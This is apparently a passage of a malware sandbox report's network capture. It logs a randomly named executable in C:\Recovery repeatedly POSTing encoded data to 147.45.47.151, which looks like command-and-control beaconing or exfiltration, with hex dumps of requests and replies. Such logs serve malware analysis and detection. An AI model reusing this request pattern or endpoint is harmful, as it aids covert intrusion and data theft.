                                                                                          48 | 192.168.2.8 | 49817 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:23.649945974 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:24.199496031 CET2512OUTData Raw: 52 5d 5f 5e 5e 5a 55 59 58 57 5a 57 52 50 51 56 5b 5a 5d 48 57 55 50 5e 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R]_^^ZUYXWZWRPQV[Z]HWUP^^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!'<##*!^)>'^$/]$4U!>Y+($R=Z#"X99.\%!Z+0
                                                                                          Dec 10, 2024 07:29:24.886307955 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:25.120743990 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:24 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          49 | 192.168.2.8 | 49823 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:25.407135963 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:25.757189035 CET2512OUTData Raw: 57 5c 5a 5f 5e 5b 55 5e 58 57 5a 57 52 53 51 50 5b 5c 5d 46 57 55 50 5f 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W\Z_^[U^XWZWRSQP[\]FWUP_^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"1??!9%"&>*-7%?4X$*$"><('=4</9.\%!Z+<
                                                                                          Dec 10, 2024 07:29:26.670553923 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:26.904870033 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:26 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          50 | 192.168.2.8 | 49829 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:27.400634050 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:27.757231951 CET2512OUTData Raw: 52 59 5f 52 5e 5f 55 51 58 57 5a 57 52 50 51 51 5b 5c 5d 47 57 5f 50 54 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: RY_R^_UQXWZWRPQQ[\]GW_PT^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!2?#)!5&*/^$<;$4R"9X)(++14!#Z99.\%!Z+0
                                                                                          Dec 10, 2024 07:29:28.661206961 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:28.900579929 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:28 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          51 | 192.168.2.8 | 49830 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:28.363713026 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1992
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:28.710391045 CET1992OUTData Raw: 57 5f 5f 5d 5b 5f 55 5e 58 57 5a 57 52 55 51 57 5b 5a 5d 41 57 57 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W__][_U^XWZWRUQW[Z]AWWP]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%<47)#6=)#]$(Y06-Y+;?*6 2-).\%!Z+(
                                                                                          Dec 10, 2024 07:29:29.624738932 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:29.856539965 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:29 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 5b 37 07 2b 12 26 0d 2c 54 38 0f 2f 51 26 3d 23 43 3e 31 3a 5d 26 16 3f 17 2e 21 3c 0d 29 5b 2d 11 28 14 38 54 3e 11 30 0c 30 35 21 46 0c 1d 24 17 26 3b 26 5c 27 3d 05 5c 26 3c 3f 1d 27 32 15 14 3e 0a 2c 52 37 33 2b 5d 27 0d 34 1d 38 2d 2e 1e 2f 1c 26 09 2a 54 32 54 31 12 22 57 0d 12 27 53 25 30 39 13 37 32 03 0f 22 57 27 0b 29 35 3b 00 30 00 27 58 22 5c 39 5a 27 22 27 02 20 37 05 07 2b 15 21 00 32 3e 22 1b 24 3b 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%[7+&,T8/Q&=#C>1:]&?.!<)[-(8T>005!F$&;&\'=\&<?'2>,R73+]'48-./&*T2T1"W'S%0972"W')5;0'X"\9Z'"' 7+!2>"$; ^*+U?WT0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          52 | 192.168.2.8 | 49832 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:29.193119049 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:29.734828949 CET2512OUTData Raw: 57 59 5f 5e 5e 5a 50 5a 58 57 5a 57 52 51 51 56 5b 51 5d 43 57 54 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WY_^^ZPZXWZWRQQV[Q]CWTPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z1'#9)!P">=3Z';'94U!<(++6 T7:.\%!Z+4
                                                                                          Dec 10, 2024 07:29:30.609009027 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:30.680636883 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:30 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          53 | 192.168.2.8 | 49837 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:30.926366091 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:31.272794962 CET2512OUTData Raw: 57 50 5a 5d 5b 5f 55 50 58 57 5a 57 52 57 51 5d 5b 5e 5d 40 57 52 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WPZ][_UPXWZWRWQ][^]@WRP]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!2,<[ :*6X*><$,'0:4"==]?8=&!2#:).\%!Z+,
                                                                                          Dec 10, 2024 07:29:32.191138983 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:32.422295094 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:31 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          54 | 192.168.2.8 | 49843 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:32.930074930 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:33.291984081 CET2512OUTData Raw: 57 5e 5f 5a 5e 5e 55 5f 58 57 5a 57 52 51 51 53 5b 5b 5d 41 57 52 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W^_Z^^U_XWZWRQQS[[]AWRP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z2?/4&Q6>=,$/ 0*W!![+8 =;&#17:).\%!Z+4
                                                                                          Dec 10, 2024 07:29:34.198673964 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:34.437215090 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:34 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          55 | 192.168.2.8 | 49848 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:34.905143976 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:35.371032000 CET | 2512 | OUT |
                                                                                          Dec 10, 2024 07:29:36.068142891 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:36.300837040 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:35 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          56 | 192.168.2.8 | 49850 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:35.171231985 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:35.645988941 CET | 2004 | OUT |
                                                                                          Dec 10, 2024 07:29:36.347218990 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:36.584733009 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:36 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          57 | 192.168.2.8 | 49855 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:36.564995050 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:36.913496017 CET | 2512 | OUT |
                                                                                          Dec 10, 2024 07:29:37.826808929 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:38.064749002 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:37 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          58 | 192.168.2.8 | 49858 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:38.728507042 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:39.085346937 CET | 2512 | OUT |
                                                                                          Dec 10, 2024 07:29:39.991241932 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:40.224749088 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:39 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          59 | 192.168.2.8 | 49864 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:40.509665012 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:41.063883066 CET | 2512 | OUT |
                                                                                          Dec 10, 2024 07:29:41.770759106 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:42.005031109 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:41 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          60 | 192.168.2.8 | 49869 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:41.846612930 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:42.203541994 CET | 2004 | OUT |
                                                                                          Dec 10, 2024 07:29:43.085283995 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:43.320847988 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:42 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          61 | 192.168.2.8 | 49870 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:42.270427942 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2504
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:42.655054092 CET | 2504 | OUT |
                                                                                          Dec 10, 2024 07:29:43.534255028 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:43.768610954 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:43 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          62 | 192.168.2.8 | 49877 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:44.788767099 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2500
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:45.147650003 CET | 2500 | OUT |
                                                                                          Dec 10, 2024 07:29:46.049194098 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:46.284291983 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:45 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          63 | 192.168.2.8 | 49882 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:46.556296110 CET | 344 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:29:46.913300991 CET | 2512 | OUT |
                                                                                          Dec 10, 2024 07:29:47.819848061 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:48.057557106 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:47 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          64 | 192.168.2.8 | 49886 | 147.45.47.151 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
